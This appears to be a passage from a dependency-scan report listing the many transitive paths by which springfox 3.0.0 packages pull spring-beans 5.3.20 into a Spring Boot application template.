  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
